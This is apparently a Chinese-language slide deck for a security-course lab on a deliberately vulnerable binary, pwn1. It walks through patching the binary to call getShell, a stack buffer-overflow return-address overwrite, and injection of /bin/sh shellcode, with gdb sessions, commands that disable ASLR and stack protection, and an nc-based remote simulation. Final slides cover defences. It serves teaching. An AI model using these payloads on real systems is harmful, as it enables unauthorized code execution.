<!doctype html>
<html lang="en">

<head>
	<meta charset="utf-8">

	<title>Reveal JS presentation</title>

	<meta name="description" content="A framework for easily creating beautiful presentations using HTML">
	<meta name="author" content="Hakim El Hattab">

	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">

	<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<link rel="stylesheet" href="libs/reveal.js/4.1.3/reset.css">
	<link rel="stylesheet" href="libs/reveal.js/4.1.3/reveal.css">

	
	
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

	  <!-- highlight Theme -->
  	
	  <link rel="stylesheet" href="libs/highlight.js/11.3.1/styles/monokai.min.css">
	
	
		
	<link rel="stylesheet" href="libs/reveal.js/4.1.3/plugin/chalkboard/style.css">
	
	
	
		<link rel="stylesheet" href="libs/reveal.js/4.1.3/plugin/customcontrols/style.css">
	
	<link rel="stylesheet" href="libs/styles/tasklist.css">



  <!-- Revealjs Theme -->
  
  	<link rel="stylesheet" href="libs/reveal.js/4.1.3/theme/beige.css" id="theme">
  
  


  <!-- Revealjs Theme -->
  

 
</head>

<body>
  


  <div class="reveal">

    <!-- Any section element inside of this container is displayed as a slide -->
    <div class="slides">

      


    
        <section >
            
            <style type="text/css">
    p { text-align: left; }
    h2 { text-align: left; }
</style>
            </section>
    



    
    <section>
        <section >
            <h2>1 逆向及Bof基础实践说明</h2>

            </section>
        
            <section >
                <h3>1.1 实践目标</h3>
<p>本次实践的对象是一个名为pwn1的linux可执行文件。</p>
<p>该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。</p>
<p>该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。</p>

            </section>
        
            <section >
                <ul>
<li>
<p>三个实践内容如下：</p>
<ul>
<li>手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。</li>
<li>利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。</li>
<li>注入一个自己制作的shellcode并运行这段shellcode。</li>
</ul>
</li>
<li>
<p>这几种思路，基本代表现实情况中的攻击目标:</p>
<ul>
<li>运行原本不可访问的代码片段</li>
<li>强行修改程序执行流</li>
<li>以及注入运行任意代码。</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <h3>1.2 基础知识</h3>
<p>该实践需要同学们</p>
<ul>
<li>熟悉Linux基本操作
<ul>
<li>能看懂常用指令,如管道（|），输入、输出重定向（&gt;）等。</li>
</ul>
</li>
<li>理解Bof的原理。
<ul>
<li>能看得懂汇编、机器指令、EIP、指令地址。</li>
</ul>
</li>
<li>会使用gdb,vi。</li>
</ul>
<blockquote>
<p>当然，如果还不懂，通过这个过程能对以上概念有了更进一步的理解就更好了。</p>
</blockquote>

            </section>
        
            <section >
                <ul>
<li>
<p>指令、参数</p>
<ul>
<li>这些东西，我自己也记不住，都是用时现查的。</li>
<li>所以一些具体的问题可以边做边查，但最重要的思路、想法不能乱。</li>
<li>要时刻知道，我是在做什么？现在在查什么数据？改什么数据？要改成什么样？每步操作都要单独实践验证，再一步步累加为最终结果。</li>
</ul>
</li>
<li>
<p>操作成功不重要，照着敲入指令肯定会成功。</p>
</li>
<li>
<p>重要的是理解思路。</p>
<ul>
<li>看指导理解思路，然后抛开指导自己做。</li>
<li>碰到问题才能学到知识。</li>
<li>具体的指令可以回到指导中查。</li>
</ul>
</li>
</ul>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h2>2 直接修改程序机器指令，改变程序执行流程</h2>
<ul>
<li>
<p>知识要求：Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具</p>
</li>
<li>
<p>学习目标：理解可执行文件与机器指令</p>
</li>
<li>
<p>进阶：掌握ELF文件格式，掌握动态技术</p>
</li>
</ul>

            </section>
        
            <section >
                <p>下载目标文件pwn1,反汇编。下面只保留了最核心的几行代码。</p>
<pre><code class="language-asm">
root@KaliYL:~#  objdump -d pwn1 | more

0804847d &lt;getShell&gt;:
 804847d:	55                   	push   %ebp
 ...
08048491 &lt;foo&gt;:
 8048491:	55                   	push   %ebp
 ...
080484af &lt;main&gt;:
 ...
 80484b5:	e8 d7 ff ff ff       	call   8048491 &lt;foo&gt; 
 80484ba:	b8 00 00 00 00       	mov    $0x0,%eax
 ...
</code></pre>

            </section>
        
            <section >
                <ul>
<li>先看第12行，&quot;call   8048491 <foo>&quot;是汇编指令
<ul>
<li>是说这条指令将调用位于地址8048491处的foo函数；</li>
<li>其对应机器指令为“e8 d7ffffff”，e8即跳转之意。
<ul>
<li>本来正常流程，此时此刻EIP的值应该是下条指令的地址，即80484ba，但如一解释e8这条指令呢，CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。“d7ffffff”是补码,表示-41，41=0x29,80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值，</li>
</ul>
</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <ul>
<li>
<p>main函数调用foo，对应机器指令为“	e8 d7ffffff”，</p>
<ul>
<li>那我们想让它调用getShell，只要修改“d7ffffff”为，&quot;getShell-80484ba&quot;对应的补码就行。</li>
<li>用Windows计算器，直接 47d-4ba就能得到补码，是c3ffffff。</li>
</ul>
</li>
<li>
<p>下面我们就修改可执行文件，将其中的call指令的目标地址由d7ffffff变为c3ffffff。</p>
</li>
</ul>

            </section>
        
            <section >
                <pre><code>root@KaliYL:~# cp pwn1 pwn2
root@KaliYL:~# vi pwn2
以下操作是在vi内
1.按ESC键
2.输入如下，将显示模式切换为16进制模式
:%!xxd
3.查找要修改的内容
/e8d7
4.找到后前后的内容和反汇编的对比下，确认是地方是正确的
5.修改d7为c3
6.转换16进制为原格式
:%!xxd -r
7.存盘退出vi
:wq

</code></pre>

            </section>
        
            <section >
                <p>以上编辑操作也可以在图形化的16进制编程器中完成。实测可用。</p>
<pre><code>root@KaliYL:~# apt-get install wxhexeditor
root@KaliYL:~# wxHexEditor
</code></pre>

            </section>
        
            <section >
                <pre><code>8.再反汇编看一下，call指令是否正确调用getShell
root@KaliYL:~# objdump -d pwn2 | more
...
080484af &lt;main&gt;:
 80484af:	55                   	push   %ebp
 80484b0:	89 e5                	mov    %esp,%ebp
 80484b2:	83 e4 f0             	and    $0xfffffff0,%esp
 80484b5:	e8 c3 ff ff ff       	call   804847d &lt;getShell&gt;
 80484ba:	b8 00 00 00 00       	mov    $0x0,%eax

9.运行下改后的代码，会得到shell提示符#
root@KaliYL:~# ./pwn2
# ls
20135201_met_rtcp_136_443backdoor.exe  pwn1.bak

</code></pre>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h2>3 通过构造输入参数，造成BOF攻击，改变程序执行流</h2>
<blockquote>
<p>知识要求：堆栈结构，返回地址
学习目标：理解攻击缓冲区的结果，掌握返回地址的获取
进阶：掌握ELF文件格式，掌握动态技术</p>
</blockquote>

            </section>
        
            <section >
                <h3>3.1 反汇编，了解程序的基本功能</h3>
<pre><code class="language-asm">
root@KaliYL:~#  objdump -d pwn1 | more

 8048477:	90                   	nop
 8048478:	e9 73 ff ff ff       	jmp    80483f0 &lt;register_tm_clones&gt;

== 注意这个函数getShell，我们的目标是触发这个函数  ==

0804847d &lt;getShell&gt;:
 804847d:	55                   	push   %ebp
 804847e:	89 e5                	mov    %esp,%ebp
 8048480:	83 ec 18             	sub    $0x18,%esp
 8048483:	c7 04 24 60 85 04 08 	movl   $0x8048560,(%esp)
 804848a:	e8 c1 fe ff ff       	call   8048350 &lt;system@plt&gt;
 804848f:	c9                   	leave  
 8048490:	c3                   	ret    

== 该可执行文件正常运行是调用如下函数foo，这个函数有Buffer overflow漏洞  ==

08048491 &lt;foo&gt;:
 8048491:	55                   	push   %ebp
 8048492:	89 e5                	mov    %esp,%ebp
 8048494:	83 ec 38             	sub    $0x38,%esp
 8048497:	8d 45 e4             	lea    -0x1c(%ebp),%eax
 804849a:	89 04 24             	mov    %eax,(%esp)
 
 == 这里读入字符串，但系统只预留了__字节的缓冲区，超出部分会造成溢出，我们的目标是覆盖返回地址 ==
 
 804849d:	e8 8e fe ff ff       	call   8048330 &lt;gets@plt&gt;
 80484a2:	8d 45 e4             	lea    -0x1c(%ebp),%eax
 80484a5:	89 04 24             	mov    %eax,(%esp)
 80484a8:	e8 93 fe ff ff       	call   8048340 &lt;puts@plt&gt;
 80484ad:	c9                   	leave  
 80484ae:	c3                   	ret    

080484af &lt;main&gt;:
 80484af:	55                   	push   %ebp
 80484b0:	89 e5                	mov    %esp,%ebp
 80484b2:	83 e4 f0             	and    $0xfffffff0,%esp
 80484b5:	e8 d7 ff ff ff       	call   8048491 &lt;foo&gt;
 
 ==上面的call调用foo,同时在堆栈上压上返回地址值:__________== 
 
 80484ba:	b8 00 00 00 00       	mov    $0x0,%eax
 80484bf:	c9                   	leave  
 80484c0:	c3                   	ret    
 80484c1:	66 90                	xchg   %ax,%ax
 80484c3:	66 90                	xchg   %ax,%ax
 80484c5:	66 90                	xchg   %ax,%ax
 80484c7:	66 90                	xchg   %ax,%ax
 80484c9:	66 90                	xchg   %ax,%ax
 80484cb:	66 90                	xchg   %ax,%ax
 80484cd:	66 90                	xchg   %ax,%ax
 80484cf:	90                   	nop

080484d0 &lt;__libc_csu_init&gt;:

</code></pre>

            </section>
        
            <section >
                <h3>3.2 确认输入字符串哪几个字符会覆盖到返回地址</h3>
<pre><code>
root@KaliYL:~# gdb pwn1
(gdb) r
Starting program: /root/pwn1 
1111111122222222333333334444444455555555
1111111122222222333333334444444455555555

Program received signal SIGSEGV, Segmentation fault.
0x35353535 in ?? ()
(gdb) info r
eax            0x29	41
ecx            0xffffffff	-1
edx            0xf7fab870	-134563728
ebx            0x0	0
esp            0xffffd320	0xffffd320
ebp            0x34343434	0x34343434
esi            0xf7faa000	-134569984
edi            0xf7faa000	-134569984
eip            0x35353535	0x35353535            //注意EIP的值，是ASCII 5
eflags         0x10246	[ PF ZF IF RF ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x63	99
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/pwn1 
1111111122222222333333334444444412345678
1111111122222222333333334444444412345678

Program received signal SIGSEGV, Segmentation fault.
0x34333231 in ?? ()
(gdb) info r
eip            0x34333231	0x34333231
eflags         0x10246	[ PF ZF IF RF ]

(gdb) 

</code></pre>

            </section>
        
            <section >
                <p>如果输入字符串1111111122222222333333334444444412345678，那 1234 那四个数最终会覆盖到堆栈上的返回地址，进而CPU会尝试运行这个位置的代码。那只要把这四个字符替换为 getShell 的内存地址，输给pwn1，pwn1就会运行getShell。</p>

            </section>
        
            <section >
                <h3>3.3 确认用什么值来覆盖返回地址</h3>
<p>getShell的内存地址，通过反汇编时可以看到，即0804847d。</p>
<p>接下来要确认下字节序，简单说是输入11111111222222223333333344444444\x08\x04\x84\x7d,还是输入11111111222222223333333344444444\x7d\x84\x04\x08。</p>

            </section>
        
            <section >
                <pre><code>(gdb) break *0x804849d
Breakpoint 2 at 0x804849d
(gdb) info break
Num     Type           Disp Enb Address    What
1       breakpoint     keep y   &lt;PENDING&gt;  x804849d
2       breakpoint     keep y   0x0804849d &lt;foo+12&gt;
(gdb) r
Starting program: /root/pwn1 

Breakpoint 2, 0x0804849d in foo ()
(gdb) info r
eip            0x804849d	0x804849d &lt;foo+12&gt;

</code></pre>
<p>对比之前 <mark>eip            0x34333231	0x34333231</mark> ，正确应用输入 <mark>11111111222222223333333344444444\x7d\x84\x04\x08</mark>。</p>

            </section>
        
            <section >
                <h3>3.4 构造输入字符串</h3>
<p>由为我们没法通过键盘输入\x7d\x84\x04\x08这样的16进制值，所以先生成包括这样字符串的一个文件。\x0a表示回车，如果没有的话，在程序运行时就需要手工按一下回车键。</p>
<pre><code>root@KaliYL:~# perl -e 'print &quot;11111111222222223333333344444444\x7d\x84\x04\x08\x0a&quot;' &gt; input
</code></pre>
<blockquote>
<p>关于Perl：
Perl是一门解释型语言，不需要预编译，可以在命令行上直接使用。
使用输出重定向“&gt;”将perl生成的字符串存储到文件input中。</p>
</blockquote>

            </section>
        
            <section >
                <p>可以使用16进制查看指令xxd查看input文件的内容是否如预期。</p>
<pre><code class="language-bash">root@KaliYL:~# xxd input
00000000: 3131 3131 3131 3131 3232 3232 3232 3232  1111111122222222
00000010: 3333 3333 3333 3333 3434 3434 3434 3434  3333333344444444
00000020: 7d84 0408 0a                             }....
root@KaliYL:~# 

</code></pre>

            </section>
        
            <section >
                <p>然后将input的输入，通过管道符“|”，作为pwn1的输入。</p>
<pre><code class="language-bash">root@KaliYL:~# (cat input; cat) | ./pwn1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}�
ls //这是获取Shell后我输入的指令
20135201_met_rtcp_136_443backdoor.exe  ropasurusrex_
attacker.js			       ropasurusrex_.zip
backdoor			       shell.php
blpVUtjb.jpeg			       UserDatabase.mv.db
c				       webgoat-container-7.0.1-war-exec.jar
pwn1

</code></pre>

            </section>
        
            <section >
                <pre><code>root@KaliYL:~# (perl -e 'print &quot;11111111222222223333333344444444\x7d\x84\x04\x08\x0a&quot;';cat) | ./pwn1
11111111222222223333333344444444}�
ls
20135201_met_rtcp_136_443backdoor.exe  pwn1

</code></pre>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h2>4. 注入Shellcode并执行</h2>

            </section>
        
            <section >
                <h3>4.1 准备一段Shellcode</h3>
<ul>
<li>shellcode就是一段机器指令（code）
<ul>
<li>通常这段机器指令的目的是为获取一个交互式的shell（像linux的shell或类似windows下的cmd.exe），</li>
<li>所以这段机器指令被称为shellcode。</li>
<li>在实际的应用中，凡是用来注入的机器指令段都通称为shellcode，像添加一个用户、运行一条指令。</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <p>最基本的shellcode的编写可参考许同学的文章<a href="http://www.cnblogs.com/xxy745214935/p/6477120.html">Shellcode入门</a>，写得非常之清楚详实。以下实践即使用该文章中生成的shellcode。如下：</p>
<pre><code>
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\

</code></pre>

            </section>
        
            <section >
                <p>关于更多Shellcode的知识，请参考<a href="http://git.oschina.net/wildlinux/NetSec/blob/master/ExpGuides/MAL_Shellcode%E5%9F%BA%E7%A1%80.md">Shellcode基础</a>。</p>

            </section>
        
            <section >
                <h3>4.2 准备工作</h3>
<p>修改些设置。这部分的解释请看第5小节Bof攻击防御技术.</p>
<pre><code>root@KaliYL:~# execstack -s pwn1    //设置堆栈可执行
root@KaliYL:~# execstack -q pwn1    //查询文件的堆栈是否可执行
X pwn1
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space 
2
root@KaliYL:~# echo &quot;0&quot; &gt; /proc/sys/kernel/randomize_va_space //关闭地址随机化
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space 
0

</code></pre>

            </section>
        
            <section >
                <h3>4.3 构造要注入的payload。</h3>
<ul>
<li>Linux下有两种基本构造攻击buf的方法：
<ul>
<li>retaddr+nop+shellcode</li>
<li>nop+shellcode+retaddr。</li>
</ul>
</li>
<li>因为retaddr在缓冲区的位置是固定的，shellcode要不在它前面，要不在它后面。</li>
<li>简单说缓冲区小就把shellcode放后边，缓冲区大就把shellcode放前边</li>
</ul>

            </section>
        
            <section >
                <ul>
<li>我们这个buf够放这个shellcode了</li>
<li>结构为：nops+shellcode+retaddr。
<ul>
<li>nop一为是了填充，二是作为“着陆区/滑行区”。</li>
<li>我们猜的返回地址只要落在任何一个nop上，自然会滑到我们的shellcode。</li>
</ul>
</li>
</ul>

            </section>
        
            <section >
                <pre><code class="language-bash">root@KaliYL:~# perl -e 'print &quot;\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00&quot;' &gt; input_shellcode

上面最后的\x4\x3\x2\x1将覆盖到堆栈上的返回地址的位置。我们得把它改为这段shellcode的地址。
特别提醒：最后一个字符千万不能是\x0a。不然下面的操作就做不了了。

</code></pre>

            </section>
        
            <section >
                <p>接下来我们来确定\x4\x3\x2\x1到底该填什么。</p>
<p>打开一个终端注入这段攻击buf：</p>
<pre><code class="language-bash">root@KaliYL:~# (cat input_shellcode;cat) | ./pwn1
������1�Ph//shh/bin��PS��1Ұ
                           �

</code></pre>

            </section>
        
            <section >
                <p>再开另外一个终端，用gdb来调试pwn1这个进程。</p>
<pre><code class="language-bash">//1.找到pwn1的进程号是：27728

root@KaliYL:/home# ps -ef | grep pwn1
root      27728  25675  0 10:19 pts/1    00:00:00 ./pwn1
root      27732  25991  0 10:19 pts/2    00:00:00 grep pwn1
root@KaliYL:/home# 

//2.启动gdb调试这个进程
root@KaliYL:/home# gdb
(gdb) attach 27728
Attaching to process 27728

//3. 通过设置断点，来查看注入buf的内存地址
(gdb) disassemble foo
Dump of assembler code for function foo:
   0x08048491 &lt;+0&gt;:	push   %ebp
   0x08048492 &lt;+1&gt;:	mov    %esp,%ebp
   0x08048494 &lt;+3&gt;:	sub    $0x38,%esp
   0x08048497 &lt;+6&gt;:	lea    -0x1c(%ebp),%eax
   0x0804849a &lt;+9&gt;:	mov    %eax,(%esp)
   0x0804849d &lt;+12&gt;:	call   0x8048330 &lt;gets@plt&gt;
   0x080484a2 &lt;+17&gt;:	lea    -0x1c(%ebp),%eax
   0x080484a5 &lt;+20&gt;:	mov    %eax,(%esp)
   0x080484a8 &lt;+23&gt;:	call   0x8048340 &lt;puts@plt&gt;
   0x080484ad &lt;+28&gt;:	leave  
   0x080484ae &lt;+29&gt;:	ret    //断在这，这时注入的东西都大堆栈上了
                              //ret完，就跳到我们覆盖的retaddr那个地方了
End of assembler dump.
(gdb) break *0x080484ae
Breakpoint 1 at 0x80484ae
//在另外一个终端中按下回车，这就是前面为什么不能以\x0a来结束 input_shellcode的原因。
(gdb) c
Continuing.

Breakpoint 1, 0x080484ae in foo ()
(gdb) info r esp
esp            0xffffd31c	0xffffd31c
(gdb) x/16x 0xffffd31c  //看到 01020304了，再往前找
0xffffd31c:	0x01020304	0xf7fa0000	0xf7faa000	0x00000000
0xffffd32c:	0xf7e135f7	0x00000001	0xffffd3c4	
(gdb) x/16x 0xffffd300   //看到9090310c了，再往前一点
0xffffd300:	0xc0319090	0x2f2f6850	0x2f686873	0x896e6962
0xffffd310:	0x895350e3	0xb0d231e1	0x9080cd0b	
(gdb) x/16x 0xffffd2fc //从这开始就是我们的Shellcode
0xffffd2fc:	0x90909090	0xc0319090	0x2f2f6850	0x2f686873
0xffffd30c:	0x896e6962	0x895350e3	0xb0d231e1	0x9080cd0b
0xffffd31c:	0x01020304	0xf7fa0000	0xf7faa000	0x00000000
0xffffd32c:	0xf7e135f7	0x00000001	0xffffd3c4	0xffffd3cc 
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x01020304 in ?? ()       //这个返回地址占位也是对的
(gdb) quit


//4.我决定将返回地址改为0xffffd300。
root@KaliYL:~# perl -e 'print &quot;\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00&quot;' &gt; input_shellcode
root@KaliYL:~# (cat input_shellcode;cat) | ./pwn1
������1�Ph//shh/bin��PS��1Ұ
                           �
ls
Segmentation fault
root@KaliYL:~#               //唉，没成功耶

//5.查找原因。同上面步骤运行，gdb调试。
(gdb) attach 27883
(gdb) break *0x080484ae
Breakpoint 1 at 0x80484ae
(gdb) c
Continuing.

Breakpoint 1, 0x080484ae in foo ()
(gdb) info r
esp            0xffffd31c	0xffffd31c
eip            0x80484ae	0x80484ae &lt;foo+29&gt;

(gdb) x/16x 0xffffd300 //看起来buf没问题
0xffffd300:	0xc0319090	0x2f2f6850	0x2f686873	0x896e6962
0xffffd310:	0x895350e3	0xb0d231e1	0x9080cd0b	0xffffd300
0xffffd320:	0xf7fa0000	0xf7faa000	0x00000000	0xf7e135f7
0xffffd330:	0x00000001	0xffffd3c4	0xffffd3cc	0x00000000

</code></pre>

            </section>
        
            <section >
                <p><img src="http://images2015.cnblogs.com/blog/886492/201702/886492-20170228010811126-2106698381.png" alt="">
单步时大家可以对着shellcode的汇编看。我是看执行了几个字节，来猜到哪步了。</p>
<pre><code class="language-bash">(gdb) si //si是step instruction的简写，表示运行一条指令  
0xffffd300 in ?? ()   //也跳转到我们的shellcode了，那我们就一步步执行看哪步错
(gdb) si
0xffffd301 in ?? ()   //nop
(gdb) si 
0xffffd302 in ?? ()   //xor %eax,%eax
(gdb) si
0xffffd304 in ?? ()
(gdb) si
0xffffd305 in ?? ()
(gdb) si
0xffffd30a in ?? ()
(gdb) si
0xffffd30f in ?? ()
(gdb) si
0xffffd311 in ?? ()
(gdb) si
0xffffd312 in ?? ()   //push %ebx 是这句出的错
(gdb) si

Program received signal SIGSEGV, Segmentation fault.
0xffffd312 in ?? ()
(gdb) info r esp    //问题呢可能是我的代码也在堆栈上，当前栈顶也在这，一push就把指令自己给覆盖了，咋能这么巧呢
esp            0xffffd310	0xffffd310
(gdb) 

</code></pre>
<p>上面部分是坑，你跳了没！！</p>

            </section>
        
            <section >
                <h3>重新开始</h3>
<p>结构为：anything+retaddr+nops+shellcode。</p>
<pre><code>(gdb) x/16x 0xffffd31c  //看到 01020304了，就是返回地址的位置。shellcode就挨着，所以地址是 0xffffd320
0xffffd31c:	0x01020304	0xf7fa0000	0xf7faa000	0x00000000
0xffffd32c:	0xf7e135f7	0x00000001	0xffffd3c4

</code></pre>

            </section>
        
            <section >
                <pre><code class="language-bash">root@KaliYL:~# perl -e 'print &quot;A&quot; x 32;print &quot;\x20\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00&quot;' &gt; input_shellcode

root@KaliYL:~# xxd input_shellcode
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 20d3 ffff 9090 9090 9090 31c0 5068 2f2f   .........1.Ph//
00000030: 7368 682f 6269 6e89 e350 5389 e131 d2b0  shh/bin..PS..1..
00000040: 0bcd 8090 00d3 ffff 00                   .........

root@KaliYL:~# (cat input_shellcode;cat) | ./pwn1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ���������1�Ph//shh/bin��PS��1Ұ
                                                               �
ls
20135201_met_rtcp_136_443backdoor.exe  pwn1

</code></pre>
<p>wow成功了！！</p>

            </section>
        
            <section >
                <p>是不是很简单？是不是很简单？是不是很简单？</p>
<p>如果你觉得的“是”，注意这个事实：以上实践是在非常简单的一个预设条件下完成的：</p>
<p>（1）关闭堆栈保护（gcc <a href="https://en.wikipedia.org/wiki/Buffer_overflow_protection#GNU_Compiler_Collection_(GCC)">-fno-stack-protector</a>）</p>
<p>（2）关闭堆栈执行保护(execstack -s)</p>
<p>（3）关闭地址随机化 (/proc/sys/kernel/randomize_va_space=0)</p>
<p>（4）在x32环境下</p>
<p>（5）在Linux实践环境</p>
<p>可以继续研究更换以上任何一个条件下如何继续bof攻击。</p>

            </section>
        
            <section >
                <h3>4.5 结合nc模拟远程攻击</h3>
<p>本例中是在同一台主机上做的实验；该实验最好在互相连通的两台Linux上做，将ip地址替换为主机1的IP即可。</p>
<p>主机1，模拟一个有漏洞的网络服务：</p>
<pre><code>root:~# nc -l 127.0.0.1 -p 28234  -e ./pwn1

-l 表示listen, -p 后加端口号 -e 后加可执行文件，网络上接收的数据将作为这个程序的输入

</code></pre>
<p>主机2，连接主机1并发送攻击载荷：</p>
<pre><code>root@KaliYL:~# (cat input_shellcode; cat) | nc 127.0.0.1 28234
输入shell指令就可以了
ls

</code></pre>

            </section>
        

    </section>
    



    
    <section>
        <section >
            <h2>5 Bof攻击防御技术</h2>

            </section>
        
            <section >
                <h3>5.1. 从防止注入的角度。</h3>
<p>在编译时，编译器在每次函数调用前后都加入一定的代码，用来设置和检测堆栈上设置的特定数字，以确认是否有bof攻击发生。</p>
<p><a href="http://www.ibm.com/developerworks/cn/linux/l-cn-gccstack/index.html">GCC 中的编译器堆栈保护技术</a></p>

            </section>
        
            <section >
                <h3>5.2. 注入入了也不让运行。</h3>
<p>结合CPU的页面管理机制，通过DEP/NX用来将堆栈内存区设置为不可执行。这样即使是注入的shellcode到堆栈上，也执行不了。</p>
<pre><code class="language-bash">root@KaliYL:~# apt-cache search execstack
execstack - ELF GNU_STACK program header editing utility
root@KaliYL:~# apt-get install execstack

root@KaliYL:~# execstack --help
Usage: execstack [OPTION...]
execstack -- program to query or set executable stack flag

  -c, --clear-execstack      Clear executable stack flag bit
  -q, --query                Query executable stack flag bit
  -s, --set-execstack        Set executable stack flag bit

root@KaliYL:~# execstack -s pwn1    //设置堆栈可执行
root@KaliYL:~# execstack -q pwn1    //查询文件的堆栈是否可执行
X pwn1

</code></pre>
<p><a href="https://linux.die.net/man/8/execstack">Linux可执行文件堆栈执行标识设置</a></p>

            </section>
        
            <section >
                <h3>5.3. 增加shellcode的构造难度。</h3>
<p>shellcode中需要<em>猜测</em><mark>返回地址</mark>的位置，需要<em>猜测</em>shellcode注入后的内存位置。这些都极度依赖一个事实：应用的代码段、堆栈段每次都被OS放置到固定的内存地址。ALSR，地址随机化就是让OS每次都用不同的地址加载应用。这样通过预先反汇编或调试得到的那些地址就都不正确了。</p>
<p><img src="./DR/Ch2_ASLR.gif" alt="ASLR"></p>

            </section>
        
            <section >
                <pre><code class="language-bash">/proc/sys/kernel/randomize_va_space用于控制Linux下 内存地址随机化机制（address space layout randomization)，有以下三种情况
 
0 - 表示关闭进程地址空间随机化。
1 - 表示将mmap的基址，stack和vdso页面随机化。
2 - 表示在1的基础上增加栈（heap）的随机化。


root@KaliYL:~# more /proc/sys/kernel/randomize_va_space 
2
root@KaliYL:~# echo &quot;0&quot; &gt; /proc/sys/kernel/randomize_va_space
root@KaliYL:~# more /proc/sys/kernel/randomize_va_space 
0
</code></pre>
<p><a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization#Exploitation">ASLR Exploitation</a></p>

            </section>
        
            <section >
                <h3>5.4 从管理的角度</h3>
<p>加强编码质量。注意边界检测。使用最新的安全的库函数。</p>

            </section>
        

    </section>
    



    
        <section >
            
            <h2>6 扩展阅读</h2>
<p>64位系统对BOF攻击影响非常大，基本先天免疫。一个原因是地址空间大，每个地址都有大量00，没法注啊。启用地址随机化后，也没法猜啊。想研究可以读下<a href="http://git.oschina.net/wildlinux/NetSec/attach_files">附件</a>中的《x86-64 buffer overflow.pdf》。</p>
<p>接下来可以做一下实验楼的<a href="https://www.shiyanlou.com/courses/233/labs/754/document">Return-to-libc 攻击实验</a>。再研究 rop (Return Orientated Programming)<a href="http://www.cnblogs.com/alisecurity/p/5646656.html">rop攻击实例</a>。多动手实践<a href="http://git.oschina.net/wildlinux/NetSec/blob/master/ExpGuides/%E5%9F%BA%E6%9C%ACLinux%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BB.md?dir=0&amp;filepath=ExpGuides%2F%E5%9F%BA%E6%9C%ACLinux%E6%BC%8F%E6%B4%9E%E6%94%BB%E5%87%BB.md&amp;oid=5511babd7f47062a57abaff9345bdb2d61208e63&amp;sha=10b5cc2f39023868c5743fe44d6ee3e71963f89b">基本Linux漏洞攻击</a>。</p>
<p>最后看看各种技术持综述：<a href="http://www.freebuf.com/articles/system/127207.html">矛与盾：二进制漏洞攻防思想对抗</a>。</p>

            </section>
    


    </div>


  </div>

  	
	<script src="libs/reveal.js/4.1.3/reveal.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/zoom/zoom.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/notes/notes.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/search/search.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/markdown/markdown.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/highlight/highlight.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/menu/menu.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/math/math.js"></script>

	<script src="libs/reveal.js/4.1.3/plugin/fullscreen/plugin.js"></script>
  
  	<script src="libs/reveal.js/4.1.3/plugin/animate/plugin.js"></script>
  	<script src="libs/reveal.js/4.1.3/plugin/animate/svg.min.js"></script>
  
  	<script src="libs/reveal.js/4.1.3/plugin/anything/plugin.js"></script>
	  <script src="libs/reveal.js/4.1.3/plugin/anything/Chart.min.js"></script>
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3/d3.v3.min.js"></script>				
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3.patch.js"></script>			
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3/queue.v1.min.js"></script>		
	<script src="libs/reveal.js/4.1.3/plugin/anything/d3/topojson.v1.min.js"></script>		
	<script src="libs/reveal.js/4.1.3/plugin/anything/function-plot.js"></script>

 <!--	<script src="libs/reveal.js/4.1.3/plugin/audio-slideshow/plugin.js"></script>  -->
